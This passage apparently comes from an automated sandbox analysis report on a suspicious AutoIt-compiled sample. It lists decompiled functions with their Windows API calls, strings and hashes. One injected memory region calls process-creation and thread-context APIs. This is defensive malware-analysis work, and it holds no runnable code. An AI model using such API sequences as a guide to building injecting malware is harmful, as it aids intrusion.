4c5be2-4c5bf0 call 4c5891 1949->1959 1950->1955 1953->1956 1954->1953 1965 4c5c85-4c5c87 1954->1965 1955->1967 1961 4c5ca4 1956->1961 1968 4c5c3e-4c5c43 1957->1968 1969 4c5ca1 1957->1969 1958->1943 1960 4c5bd2-4c5be0 call 4c57a3 1958->1960 1959->1955 1960->1955 1961->1910 1965->1961 1967->1957 1973 4c5c69 1968->1973 1974 4c5c45-4c5c4a 1968->1974 1969->1961 1973->1943 1977 4c5c4c-4c5c5e call 4bf2d9 call 4bf2c6 1974->1977 1978 4c5c60-4c5c67 call 4bf2a3 1974->1978 1977->1956 1978->1956
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: JOI
                                      • API String ID: 0-4205673466
                                      • Opcode ID: 99c0880efa50d9877eb99eb201b208ea62f5a40909b71fcaa93cff9d8bb87d68
                                      • Instruction ID: dfc0771778536dc886536389f1178f1f1cb9eaffa6b901f2c889bb77278c7a9d
                                      • Opcode Fuzzy Hash: 99c0880efa50d9877eb99eb201b208ea62f5a40909b71fcaa93cff9d8bb87d68
                                      • Instruction Fuzzy Hash: 7251E079900609AFCB649FA9CC45FEFBFB4AF05314F10005FF404A7292D679A982DB69
                                      Function 00493B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00493B0F,SwapMouseButtons,00000004,?), ref: 00493B40
                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00493B0F,SwapMouseButtons,00000004,?), ref: 00493B61
                                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00493B0F,SwapMouseButtons,00000004,?), ref: 00493B83
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CloseOpenQueryValue
                                      • String ID: Control Panel\Mouse
                                      • API String ID: 3677997916-824357125
                                      • Opcode ID: 12735d695d0492558284eb8d5aeb14ff84e32df10a172b5f9ec20bcd60d7c5fc
                                      • Instruction ID: f2f467cb343702c32d4cd964c04ca5995747d5153b784b9b80c6c6382181961b
                                      • Opcode Fuzzy Hash: 12735d695d0492558284eb8d5aeb14ff84e32df10a172b5f9ec20bcd60d7c5fc
                                      • Instruction Fuzzy Hash: 96115AB5510208FFDF208FA4DC48EAFBBB8EF02749B10446AA805D7211D231AE45A7A4
                                      Function 036D12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 036D1A5B
                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 036D1AF1
                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 036D1B13
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2377113128.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_36d0000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                      • String ID:
                                      • API String ID: 2438371351-0
                                      • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                      • Instruction ID: c300c9b42725e6341e9885a8d4ea16e890cf23af553768fe713799898de1cc50
                                      • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                      • Instruction Fuzzy Hash: A762F834E14258DBEB24CBA4C850BDEB376EF59300F1091A9D10DEB394E7B99E81CB59
                                      Function 00493923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 004D33A2
                                        • Part of subcall function 00496B57: _wcslen.LIBCMT ref: 00496B6A
                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00493A04
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: IconLoadNotifyShell_String_wcslen
                                      • String ID: Line:
                                      • API String ID: 2289894680-1585850449
                                      • Opcode ID: 35318f983ef5d160f856def4d2254fbe784cdd37ccda7148af1cfaf1c488b516
                                      • Instruction ID: 99d89a8c762eb68755fec43f1932f9c56b90a1394c41192be2d2748d6ba607aa
                                      • Opcode Fuzzy Hash: 35318f983ef5d160f856def4d2254fbe784cdd37ccda7148af1cfaf1c488b516
                                      • Instruction Fuzzy Hash: 0331E6715083006ACB20EF24DC45BEB7BD8AB51719F04493FF49983291DB789A49C7CA
                                      Function 00492DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetOpenFileNameW.COMDLG32(?), ref: 004D2C8C
                                        • Part of subcall function 00493AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00493A97,?,?,00492E7F,?,?,?,00000000), ref: 00493AC2
                                        • Part of subcall function 00492DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00492DC4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Name$Path$FileFullLongOpen
                                      • String ID: X$`eU
                                      • API String ID: 779396738-2857220807
                                      • Opcode ID: aeef98a5f76c149f6c4c46776e80f9f1996a80d3281e45f66970308bb009f36b
                                      • Instruction ID: 80441e5a01473c0ea12bf16868c86751e1b25494ccc55e18773ff452863981e6
                                      • Opcode Fuzzy Hash: aeef98a5f76c149f6c4c46776e80f9f1996a80d3281e45f66970308bb009f36b
                                      • Instruction Fuzzy Hash: 4A21A471A00298AECF019F95C855BEE7FF8AF49305F40406BE405A7341DBF859498B65
                                      Function 004AFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004B0668
                                        • Part of subcall function 004B32A4: RaiseException.KERNEL32(?,?,?,004B068A,?,00561444,?,?,?,?,?,?,004B068A,00491129,00558738,00491129), ref: 004B3304
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004B0685
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw$ExceptionRaise
                                      • String ID: Unknown exception
                                      • API String ID: 3476068407-410509341
                                      • Opcode ID: 2ec1009ae868391628ab1872dc515cb5a0de346c09134c17a4a2713c57f125a9
                                      • Instruction ID: 6e5fd265bfcf449e73c0132c68048c626a03369a2f80f981ca53e20c46f02ef8
                                      • Opcode Fuzzy Hash: 2ec1009ae868391628ab1872dc515cb5a0de346c09134c17a4a2713c57f125a9
                                      • Instruction Fuzzy Hash: BFF0283080020C738F04BAA6D846CDF7B6CAE50305B604037B814915D2EF39DA1AC6A8
                                      Function 00503017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0050302F
                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00503044
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Temp$FileNamePath
                                      • String ID: aut
                                      • API String ID: 3285503233-3010740371
                                      • Opcode ID: 3714fad22d7e58f7173adf055a0603305d0e6826e8da90fdb8f7e7732a374384
                                      • Instruction ID: c7cec1bb04099c2205ca9e28bfc8afdcb9f0aa75f036ebd91f25baa82466edd0
                                      • Opcode Fuzzy Hash: 3714fad22d7e58f7173adf055a0603305d0e6826e8da90fdb8f7e7732a374384
                                      • Instruction Fuzzy Hash: F8D05B75500314A7DA3097949C0DFCB3E6CDF05751F4001917695D2091DEB09549CAD0
                                      Function 00517F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 005182F5
                                      • TerminateProcess.KERNEL32(00000000), ref: 005182FC
                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 005184DD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Process$CurrentFreeLibraryTerminate
                                      • String ID:
                                      • API String ID: 146820519-0
                                      • Opcode ID: 86c3c6fc2334567464a5cee1e116e20fc73b38f6923c4c4fa577c0f640693c50
                                      • Instruction ID: 7a8119b2a30eec5b68bb1ea424432b23e6279d9005348b9f92a587c8ba831a0c
                                      • Opcode Fuzzy Hash: 86c3c6fc2334567464a5cee1e116e20fc73b38f6923c4c4fa577c0f640693c50
                                      • Instruction Fuzzy Hash: 46128E719083019FD720DF28C484B6ABBE1FF89318F04895DE8998B252DB34ED85CF92
                                      Function 004910F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00491BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00491BF4
                                        • Part of subcall function 00491BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00491BFC
                                        • Part of subcall function 00491BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00491C07
                                        • Part of subcall function 00491BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00491C12
                                        • Part of subcall function 00491BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00491C1A
                                        • Part of subcall function 00491BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00491C22
                                        • Part of subcall function 00491B4A: RegisterWindowMessageW.USER32(00000004,?,004912C4), ref: 00491BA2
                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0049136A
                                      • OleInitialize.OLE32 ref: 00491388
                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 004D24AB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                      • String ID:
                                      • API String ID: 1986988660-0
                                      • Opcode ID: 316d346fac7616a18aaacd0fc3a10fc7ad3d532c3c8fa40c0505db6a2f4ef1c4
                                      • Instruction ID: 64d59e37b6ae8cdec01861aaf85079787786c3f9c96179ffc0574e64351a6d9e
                                      • Opcode Fuzzy Hash: 316d346fac7616a18aaacd0fc3a10fc7ad3d532c3c8fa40c0505db6a2f4ef1c4
                                      • Instruction Fuzzy Hash: 3F71BDB4901A018ECB94DF7EA945679BEE0BBB934571C812ED00BC7272EBB44448EF4D
                                      Function 004C86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,004C85CC,?,00558CC8,0000000C), ref: 004C8704
                                      • GetLastError.KERNEL32(?,004C85CC,?,00558CC8,0000000C), ref: 004C870E
                                      • __dosmaperr.LIBCMT ref: 004C8739
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                      • String ID:
                                      • API String ID: 490808831-0
                                      • Opcode ID: 6db83b0ed6e1b76269a8a955266b35f25fc5ecc84b898fd7c170a2ebd4311f08
                                      • Instruction ID: aba6f7bf1acc646ceeae7d5cf408209b700675095e318ade2b8c20243667b66c
                                      • Opcode Fuzzy Hash: 6db83b0ed6e1b76269a8a955266b35f25fc5ecc84b898fd7c170a2ebd4311f08
                                      • Instruction Fuzzy Hash: 4E014C3A70516026C2E462345845F6F67554BA2778F35021FE8048B2E3DDAC9C82815C
                                      Function 00502FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00502CD4,?,?,?,00000004,00000001), ref: 00502FF2
                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00502CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00503006
                                      • CloseHandle.KERNEL32(00000000,?,00502CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0050300D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleTime
                                      • String ID:
                                      • API String ID: 3397143404-0
                                      • Opcode ID: 454c9915ce238334fb4476007758624941eae8ee1b1ca80aadcc7b19f36eecd7
                                      • Instruction ID: dd958f225135c0c32ba38093b8c28d3e44bc9ded455c46a40dba4330612f26e1
                                      • Opcode Fuzzy Hash: 454c9915ce238334fb4476007758624941eae8ee1b1ca80aadcc7b19f36eecd7
                                      • Instruction Fuzzy Hash: B3E0863628171077D2301755BC0EF8F3E1CDB87B71F104210F719750D146A0151692A8
                                      Function 004A1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                      Download Yara Rule
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 004A17F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Init_thread_footer
                                      • String ID: CALL
                                      • API String ID: 1385522511-4196123274
                                      • Opcode ID: fd8bb526e1cacad760d986685f3e7dc6709611f3cd35593c135eb297103ced2a
                                      • Instruction ID: fec23aedf5171cd3ed7564015755644ec850b74c511d8f38e6051a7065f9fcb6
                                      • Opcode Fuzzy Hash: fd8bb526e1cacad760d986685f3e7dc6709611f3cd35593c135eb297103ced2a
                                      • Instruction Fuzzy Hash: C222AE70608341DFC714DF15C484A2ABBF1BFAA358F14892EF4968B3A1D739E845CB5A
                                      Function 00506EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 00506F6B
                                        • Part of subcall function 00494ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00561418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00494EFD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: LibraryLoad_wcslen
                                      • String ID: >>>AUTOIT SCRIPT<<<
                                      • API String ID: 3312870042-2806939583
                                      • Opcode ID: 8bde1c41113c17674d560e3b3848b64d3fe232de23673bce7446a863ce353009
                                      • Instruction ID: f5c5d184ce6a8d33d171c817880d87b51e60bfc5343a131b638f9ddaf104adb6
                                      • Opcode Fuzzy Hash: 8bde1c41113c17674d560e3b3848b64d3fe232de23673bce7446a863ce353009
                                      • Instruction Fuzzy Hash: 7CB1A4315082059FCF14EF25C491D6EBBE5BF94318F04492EF896872A2EB34ED49CB96
                                      Function 00502557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: __fread_nolock
                                      • String ID: EA06
                                      • API String ID: 2638373210-3962188686
                                      • Opcode ID: 319ebbb36c6182a00bae215f8d2bb4cf1b9bd4a91b22b8bfe808f71bdb8f1627
                                      • Instruction ID: 4673bb69991c20b49f1277d7160eef24875a4927685221bbdf636d382a56e419
                                      • Opcode Fuzzy Hash: 319ebbb36c6182a00bae215f8d2bb4cf1b9bd4a91b22b8bfe808f71bdb8f1627
                                      • Instruction Fuzzy Hash: BC01B5729042587EDF18C7A9CC5AEEEBBF89B05305F00455FE552D61C1E5B8E608CB64
                                      Function 00493837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00493908
